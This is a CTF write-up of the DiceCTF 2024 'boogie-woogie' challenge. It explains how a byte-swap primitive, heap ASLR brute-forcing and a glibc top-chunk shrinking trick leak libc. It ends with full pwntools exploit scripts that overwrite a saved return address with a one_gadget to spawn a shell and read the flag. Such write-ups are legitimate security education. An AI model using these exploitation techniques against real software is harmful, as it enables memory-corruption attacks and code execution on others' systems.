Boogie-woogie was a challenge in DiceCTF 2024 Quals. I played with idek and we placed 4th. I had loads of fun, see y’all in NYC :)
Before I start, a tl;dr
boogie-woogie is a fairly simple program
1000011a9 void* clap(int64_t arg1, int64_t arg2)2
3000011eb *(arg1 + &data) = *(arg1 + &data) ^ *(arg2 + &data)40000121f *(arg2 + &data) = *(arg2 + &data) ^ *(arg1 + &data)500001253 *(arg1 + &data) = *(arg1 + &data) ^ *(arg2 + &data)600001257 return arg1 + &data7
800001258 int32_t main(int32_t argc, char** argv, char** envp)9
1000001264 void* fsbase1100001264 int64_t rax = *(fsbase + 0x28)120000127d puts(str: &__art)130000128c puts(str: "\x1b[0;33mEven this cursed spiri…")1400001303 while (data != 0)1500001293 int64_t var_18 = 016000012b4 printf(format: "\n\x1b[31;49;1;4m%s\x1b[0m\n\n\n", &data)17000012c3 puts(str: "The sound of \x1b[0;33mgion shoj…")18000012e2 int64_t var_2019000012e2 __isoc99_scanf(format: "%zu %zu", &var_20, &var_18)20000012f5 clap(var_20, var_18)210000130e *(fsbase + 0x28)2200001317 if (rax == *(fsbase + 0x28))230000131f return 02400001319 __stack_chk_fail()2500001319 noreturn
1❯ checksec boogie-woogie2 Arch: amd64-64-little3 RELRO: Full RELRO4 Stack: Canary found5 NX: NX enabled6 PIE: PIE enabled
1.data (PROGBITS) section started {0xf000-0xf0b7}20000f000 __data_start:30000f000 00 00 00 00 00 00 00 00 ........4
50000f008 void* __dso_handle = __dso_handle6
70000f010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................8
90000f020 char data[0x97] = "Listen closely, cursed spirit. There is no way you do not know this. An arm is\n"100000f020 "merely a decoration. The act of applause is an acclamation of the soul!", 011.data (PROGBITS) section ended {0xf000-0xf0b7}12.bss (NOBITS) section started {0xf0b7-0xf0b8}130000f0b7 char __bss_start = 0x014.bss (NOBITS) section ended {0xf0b7-0xf0b8}
Simple in this case means that it’s easy to understand and very difficult to solve. We have the ability to swap bytes relative to the program base but… there isn’t really much there.
__dso_handle?tl;dr its just a uuid lol
it is initialized at runtime to a recursive pointer (PIE + 0xf008) and is used to filter which atexit functions run when an object is unloaded. It is a pointer because it is implicitly unique but it is never dereferenced.
I was stuck at this point for a long time — we had an obvious and fairly strong primitive but nothing to do with it. This challenge is running under ASLR so we don’t know the location of any memory segments (besides the program itself, which can be leaked from __dso_handle
).
1gef> vmmap2[ Legend: Code | Heap | Stack | Writable | ReadOnly | None | RWX ]3Start End Size Offset Perm Path40x000055f39d069000 0x000055f39d06a000 0x0000000000001000 0x0000000000000000 r-- /app/boogie-woogie50x000055f39d06a000 0x000055f39d06b000 0x0000000000001000 0x0000000000001000 r-x /app/boogie-woogie60x000055f39d06b000 0x000055f39d077000 0x000000000000c000 0x0000000000002000 r-- /app/boogie-woogie70x000055f39d077000 0x000055f39d078000 0x0000000000001000 0x000000000000d000 r-- /app/boogie-woogie80x000055f39d078000 0x000055f39d079000 0x0000000000001000 0x000000000000e000 rw- /app/boogie-woogie90x000055f39de0e000 0x000055f39de2f000 0x0000000000021000 0x0000000000000000 rw- [heap] <- $rsi, $r9
Not all areas of memory are randomized the same way. The offset between .data and the heap is randomized by ASLR but it’s not… that… random? I knew from staring at memory maps that it was always in the same general area, tested it experimentally with gdb, and then after the fact looked it up in the kernel source code. The heap on x86/64 Linux starts between 0 and 8192 pages after the end of the program (in the no-aslr case this is always 0; it starts directly after the program).
1254// https://elixir.bootlin.com/linux/latest/source/fs/binfmt_elf.c#L12541255if ((current->flags & PF_RANDOMIZE) && (randomize_va_space > 1)) {1256 /*1257 * For architectures with ELF randomization, when executing1258 * a loader directly (i.e. no interpreter listed in ELF1259 * headers), move the brk area out of the mmap region1260 * (since it grows up, and may collide early with the stack1261 * growing down), and into the unused ELF_ET_DYN_BASE region.1262 */1263 if (IS_ENABLED(CONFIG_ARCH_HAS_ELF_RANDOMIZE) &&1264 elf_ex->e_type == ET_DYN && !interpreter) {1265 mm->brk = mm->start_brk = ELF_ET_DYN_BASE;1266 }1267
1268 mm->brk = mm->start_brk = arch_randomize_brk(mm);1269#ifdef compat_brk_randomized1270 current->brk_randomized = 1;1271#endif1272}1273
1274// https://elixir.bootlin.com/linux/v6.7.4/source/arch/x86/kernel/process.c#L10311275unsigned long arch_randomize_brk(struct mm_struct *mm)1276{1277 return randomize_page(mm->brk, 0x02000000);1278}1279
1280// https://elixir.bootlin.com/linux/v6.7.4/source/mm/util.c#L3381281/**1282 * randomize_page - Generate a random, page aligned address29 collapsed lines
1283 * @start: The smallest acceptable address the caller will take.1284 * @range: The size of the area, starting at @start, within which the1285 * random address must fall.1286 *1287 * If @start + @range would overflow, @range is capped.1288 *1289 * NOTE: Historical use of randomize_range, which this replaces, presumed that1290 * @start was already page aligned. We now align it regardless.1291 *1292 * Return: A page aligned address within [start, start + range). On error,1293 * @start is returned.1294 */1295unsigned long randomize_page(unsigned long start, unsigned long range)1296{1297 if (!PAGE_ALIGNED(start)) {1298 range -= PAGE_ALIGN(start) - start;1299 start = PAGE_ALIGN(start);1300 }1301
1302 if (start > ULONG_MAX - range)1303 range = ULONG_MAX - start;1304
1305 range >>= PAGE_SHIFT;1306
1307 if (range == 0)1308 return start;1309
1310 return start + (get_random_long() % range << PAGE_SHIFT);1311}
To be quite honest this is enough on it’s own. A 1-in-8192 brute isn’t exactly fast but frankly I’ve done stupider things for a flag than a three hour brute (sry not sry infra; someone actually took it down doing this and got a POW added).
In the end though there was a pretty easy optimization that could cut that down to merely a couple hundred throws. The heap is (in this program, at the current state) 33 pages long and all we need to do is land somewhere inside the heap. Once we know a valid heap offset, we can walk back until the tcache perthread header is found — bringing an 1/8192 chance down to 1/250-ish.
1#!/usr/bin/env python32
3from pwn import *4
5e = ELF("boogie-woogie")6
7context.terminal = ["zellij", "action", "new-pane", "-d", "right", "-c", "--", "zsh", "-c"]8context.binary = e9
10
11@context.quietfunc12def conn():13 if args.LOCAL:14 r = process([e.path])15 elif args.GDB:16 r = gdb.debug([e.path])17 else:18 r = remote("localhost", 5000)19
20 return r21
22
23def main():24 def brute_heap_offset():25 idx = 026 with log.progress('Bruting') as p:27 while True:28 try:29 idx += 160 collapsed lines
30 p.status("attempt %i", idx)31 r = conn()32 r.recvuntil(b"exception")33 trial_heap_offset = 0x1995fe034 # trial_heap_offset = 0x1000 # lol testing without aslr35
36 r.sendline(f"1 {trial_heap_offset}".encode())37
38 r.recvuntil(b"exception")39 r.sendline(f"1 {trial_heap_offset}".encode())40 p.success()41 return (r, trial_heap_offset >> 12 << 12)42 except EOFError:43 with context.local(log_level='error'): r.close()44
45
46 r, heap_page = brute_heap_offset()47
48
49 def leak_relative_ptr(b):50 for x in range(8):51 r.sendline(f"{b+x} {1+x}".encode())52
53 for _ in range(8):54 r.readuntil(b"exception:")55 r.readuntil(b"4m")56 r.recvuntil(b"L")57 ptr = u64(r.read(6).ljust(8,b"\x00"))58 for x in range(8):59 r.sendline(f"{b+x} {1+x}".encode())60
61 for _ in range(8):62 r.readuntil(b"exception:")63 return ptr64
65
66 __dso_handle = leak_relative_ptr(-24)67 e.address = __dso_handle - e.symbols['__dso_handle']68 log.info(f'__dso_handle = {hex(__dso_handle)}')69 log.info(f"program base = {hex(e.address)}")70 log.info(f"offset to a heap page = {hex(heap_page)}")71 maybe_tcache_perthread = heap_page + 8 - 0x2072 r.readuntil(b"exception:")73 while True:74 r.sendline(f"1 {maybe_tcache_perthread}".encode())75 r.recvuntil(b"L")76 if r.recv(1) == b'\x91':77 r.readuntil(b"exception:")78 break79 r.readuntil(b"exception:")80 maybe_tcache_perthread -= 0x100081 heap_base = maybe_tcache_perthread - 0x882 log.info(f"offset to heap base = {hex(heap_base)}")83 # good luck pwning :)84
85 r.interactive()86
87
88if __name__ == "__main__":89 main()
So, what now?
1gef> scan heap libc2[+] Searching for addresses in 'heap' that point to 'libc'3gef>
well that sucks lmao
Usually it’s fairly straightforward to get pointers into libc in the heap. Free a chunk into unsorted bins and either side of the free list will be pointing at main_arena in libc.
1// https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L19262static struct malloc_state main_arena =3{4 .mutex = _LIBC_LOCK_INITIALIZER,5 .next = &main_arena,6 .attached_threads = 17};8
9
10// https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L154111#define bin_at(m, i) \12 (mbinptr) (((char *) &((m)->bins[((i) - 1) * 2])) \13 - offsetof (struct malloc_chunk, fd))14
15
16// https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L168017#define unsorted_chunks(M) (bin_at (M, 1))18
19// https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L462720bck = unsorted_chunks(av);21fwd = bck->fd;22if (__glibc_unlikely (fwd->bk != bck))23 malloc_printerr ("free(): corrupted unsorted chunks");24p->fd = fwd;25p->bk = bck;
Unfortunately, in this case we don’t have much ability to work with the heap in this binary. There is (as far as I’m aware) a single relevant primitive — scanf allocates a scratch buffer and then frees it at the end. However, the lifetime of this chunk (allocated, used, freed) usually just means it gets consolidated against the predecessor chunk (top chunk in this case).
So, then, how can we prevent this consolidation? We don’t have enough control over the ordering of the heap chunks to prevent it from consolidating naturally — but we do have a very strong write primitive. Can the heap be corrupted in such a way so as to prevent consolidation? Keeping in mind that we have no control between the allocation and corresponding free?
There isn’t really much on the heap to work with but the first place to look is the top chunk — where our allocated chunk is split off from and then consolidated against.
1// https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L43532use_top:3 /*4 If large enough, split off the chunk bordering the end of memory5 (held in av->top). Note that this is in accord with the best-fit6 search rule. In effect, av->top is treated as larger (and thus7 less well fitting) than any other available chunk since it can8 be extended to be as large as necessary (up to system9 limitations).10
11 We require that av->top always exists (i.e., has size >=12 MINSIZE) after initialization, so if it would otherwise be13 exhausted by current request, it is replenished. (The main14 reason for ensuring it exists is that we may need MINSIZE space15 to put in fenceposts in sysmalloc.)16 */17
18 victim = av->top;19 size = chunksize (victim);20
21 if (__glibc_unlikely (size > av->system_mem))22 malloc_printerr ("malloc(): corrupted top size");23
24 if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))25 {26 remainder_size = size - nb;27 remainder = chunk_at_offset (victim, nb);28 av->top = remainder;29 set_head (victim, nb | PREV_INUSE |31 collapsed lines
30 (av != &main_arena ? NON_MAIN_ARENA : 0));31 set_head (remainder, remainder_size | PREV_INUSE);32
33 check_malloced_chunk (av, victim, nb);34 void *p = chunk2mem (victim);35 alloc_perturb (p, bytes);36 return p;37 }38
39 /* When we are using atomic ops to free fast chunks we can get40 here for all block sizes. */41 else if (atomic_load_relaxed (&av->have_fastchunks))42 {43 malloc_consolidate (av);44 /* restore original bin index */45 if (in_smallbin_range (nb))46 idx = smallbin_index (nb);47 else48 idx = largebin_index (nb);49 }50
51 /*52 Otherwise, relay to handle system-dependent cases53 */54 else55 {56 void *p = sysmalloc (nb, av);57 if (p != NULL)58 alloc_perturb (p, bytes);59 return p;60 }
There are two cases when allocating a chunk without pulling from the bins. If the top chunk has sufficient size then a chunk is split off from the top chunk. Otherwise, it will call into sysmalloc to handle “system-dependent cases”.
Sysmalloc has a lot of weird alternate cases! Allocations of sufficient size (sufficient size being a sliding scale, starts at 128k bytes and caps at 4mb on amd64 libc 2.35) are fulfilled with mmap. If needed, it will attempt to use sbrk to extend the length of the heap. The key to our problem lies in how malloc handles an edge case involving the heap extension — new heap pages which are not not contiguous with the old heap (either because the address space is noncontiguous or because non-libc code called sbrk). In such a case malloc will skip over that segment, create a new top chunk, and then prevent consolidation and free the old top chunk.
1 /*2 If not the first time through, we either have a3 gap due to foreign sbrk or a non-contiguous region. Insert a4 double fencepost at old_top to prevent consolidation with space5 we don't own. These fenceposts are artificial chunks that are6 marked as inuse and are in any case too small to use. We need7 two to make sizes and alignments work out.8 */9
10 if (old_size != 0)11 {12 /*13 Shrink old_top to insert fenceposts, keeping size a14 multiple of MALLOC_ALIGNMENT. We know there is at least15 enough space in old_top to do this.16 */17 old_size = (old_size - 2 * CHUNK_HDR_SZ) & ~MALLOC_ALIGN_MASK;18 set_head (old_top, old_size | PREV_INUSE);19
20 /*21 Note that the following assignments completely overwrite22 old_top when old_size was previously MINSIZE. This is23 intentional. We need the fencepost, even if old_top otherwise gets24 lost.25 */26set_head (chunk_at_offset (old_top, old_size),27CHUNK_HDR_SZ | PREV_INUSE);28set_head (chunk_at_offset (old_top,29 old_size + CHUNK_HDR_SZ),8 collapsed lines
30CHUNK_HDR_SZ | PREV_INUSE);31
32 /* If possible, release the rest. */33 if (old_size >= MINSIZE)34 {35 _int_free (av, old_top, 1);36 }37 }
This is very promising, but we don’t have the ability to actually call force sbrk to return a noncontiguous page right? The answer is no — but it’s actually unnecessary! Contiguity is checked naively — the old heap end is computed based off the top chunk + top chunk size.
1// https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L26062old_top = av->top;3old_size = chunksize (old_top);4old_end = (char *) (chunk_at_offset (old_top, old_size));5// ...6// https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L25477if (brk == old_end && snd_brk == (char *) (MORECORE_FAILURE)) {8// ...9} else {10// handles noncontiguous sbrk11}
We don’t need to force sbrk to return a noncontiguous page — just convince malloc that it did do so. By using our byte swap primitive to shrink the size of the top chunk (from 0x20550 to 0x550) and then making an allocation larger than the new top chunk size (which extends the heap) we end up with the old top chunk in an unsorted bin with two pointers to libc present.
1top_chunk = heap_base + 0x0ab82r.sendline(f"-3 {top_chunk+2}")3r.sendline(b"-1 -"+b"1"*0x800)
1gef> heap bins2Unsorted Bin for arena 'main_arena'3-----------------------------------------------------------4unsorted_bin[idx=0, size=any, @0x7ffff7faacf0]: fd=0x555555564ab0, bk=0x555555564ab05 -> Chunk(addr=0x555555564ab0, size=0x530, flags=PREV_INUSE, fd=0x7ffff7faace0, bk=0x7ffff7faace0)6[+] Found 1 valid chunks in unsorted bin.
1gef> scan heap libc2[+] Searching for addresses in 'heap' that point to 'libc'3[heap]: 0x0000555555564ac0 -> 0x00007ffff7faace0 -> 0x0000555555585000 -> 0x00000000000000004[heap]: 0x0000555555564ac8 -> 0x00007ffff7faace0 -> 0x0000555555585000 -> 0x00000000000000005gef>
With arbitrary write (ish — its a swap but we could put arb bytes in the stdin buffer if needed) it’s basically over. I chose to replace a saved return address (and rbp, as rbp-0x78 needed to be writable) with a one gadget.
gg fun challenge :)
1❯ python3 solve.py2[+] Bruting: Done3[*] __dso_handle = 0x55d54865f0084[*] program base = 0x55d5486500005[*] offset to a heap page = 0x19950006[*] offset to heap base = 0x1986fe07[*] libc.address = 0x7f89e407e0008[*] stack address (main saved ret) = 0x7ffc792a86889[*] one_gadget = 0x7f89e4169c8810[+] Receiving all data: Done (9B)11[*] Closed connection to localhost port 500012b' dice{i7_S33MS_sOm3BODY_cOOK3D_h3r3_8ff4c343}\r\n'
1#!/usr/bin/env python32
3from pwn import *4
5e = ELF("boogie-woogie")6libc = ELF("./libc.so.6")7context.terminal = ["zellij", "action", "new-pane", "-d", "right", "-c", "--", "zsh", "-c"]8context.binary = e9
10
11@context.quietfunc12def conn():13 if args.LOCAL:14 r = process([e.path])15 elif args.GDB:16 r = gdb.debug([e.path])17 else:18 r = remote("localhost", 5000)19
20 return r21
22
23def main():24 def brute_heap_offset():25 idx = 026 with log.progress('Bruting') as p:27 while True:28 try:29 idx += 196 collapsed lines
30 p.status("attempt %i", idx)31 r = conn()32 r.recvuntil(b"exception")33 trial_heap_offset = 0x1995fe034 # trial_heap_offset = 0x1000 # lol testing without aslr35
36 r.sendline(f"1 {trial_heap_offset}".encode())37
38 r.recvuntil(b"exception")39 r.sendline(f"1 {trial_heap_offset}".encode())40 p.success()41 return (r, trial_heap_offset >> 12 << 12)42 except EOFError:43 with context.local(log_level='error'): r.close()44
45
46 r, heap_page = brute_heap_offset()47
48
49 def leak_relative_ptr(b):50 for x in range(8):51 r.sendline(f"{b+x} {1+x}".encode())52
53 for _ in range(8):54 r.readuntil(b"exception:")55 r.readuntil(b"4m")56 r.recvuntil(b"L")57 ptr = u64(r.read(6).ljust(8,b"\x00"))58 for x in range(8):59 r.sendline(f"{b+x} {1+x}".encode())60
61 for _ in range(8):62 r.readuntil(b"exception:")63 return ptr64
65
66 __dso_handle = leak_relative_ptr(-24)67 e.address = __dso_handle - e.symbols['__dso_handle']68 log.info(f'__dso_handle = {hex(__dso_handle)}')69 log.info(f"program base = {hex(e.address)}")70 log.info(f"offset to a heap page = {hex(heap_page)}")71 maybe_tcache_perthread = heap_page + 8 - 0x2072 r.readuntil(b"exception:")73 while True:74 r.sendline(f"1 {maybe_tcache_perthread}".encode())75 r.recvuntil(b"L")76 if r.recv(1) == b'\x91':77 r.readuntil(b"exception:")78 break79 r.readuntil(b"exception:")80 maybe_tcache_perthread -= 0x100081 heap_base = maybe_tcache_perthread - 0x882 log.info(f"offset to heap base = {hex(heap_base)}")83 top_chunk = heap_base + 0x0ab884 r.sendline(f"-3 {top_chunk+2}".encode())85 r.sendline(b"-1 -"+b"1"*0x800)86
87 libc.address = leak_relative_ptr(top_chunk+8) - 0x21ace088
89 def leak_absolute_ptr(ptr):90 return leak_relative_ptr(ptr - e.symbols['data'])91
92 def swap_absolute_str(addr_a, addr_b):93 return f"{addr_a-e.symbols['data']} {addr_b-e.symbols['data']}".encode()94
95 log.info(f"libc.address = {hex(libc.address)}")96 stack_ret_address = leak_absolute_ptr(libc.symbols['environ']) - 0x12097 log.info(f"stack address (main saved ret) = {hex(stack_ret_address)}")98 saved_rbp_address = stack_ret_address - 899 one_gadget = libc.address + 0xebc88100 log.info(f"one_gadget = {hex(one_gadget)}")101
102 one_gadget_bytes = p64(one_gadget)[0:3]103 if len(one_gadget_bytes) != len(set(one_gadget_bytes)):104 log.error(f"lower 3 one gadget bytes must all be unique")105
106 for i in range(8):107 r.sendline(swap_absolute_str(e.symbols['data']+heap_base+0xac0+i, saved_rbp_address+i))108
109 # writable=True was giving me r sections smh manually check that110 r.sendline(swap_absolute_str(stack_ret_address, next(x for x in libc.search(one_gadget_bytes[0],writable=True) if x > libc.address+0x21a000)))111 r.sendline(swap_absolute_str(stack_ret_address+1, next(x for x in libc.search(one_gadget_bytes[1],writable=True) if x > libc.address+0x21a000)))112 r.sendline(swap_absolute_str(stack_ret_address+2, next(x for x in libc.search(one_gadget_bytes[2],writable=True) if x > libc.address+0x21a000)))113
114 r.sendline(b"0 0")115 r.sendline(b"cat flag.txt;exit")116 r.recvuntil(b"$")117 print(r.recvall())118 # dice{i7_S33MS_sOm3BODY_cOOK3D_h3r3_8ff4c343}119 # good luck pwning :)120
121 # r.interactive()122
123
124if __name__ == "__main__":125 main()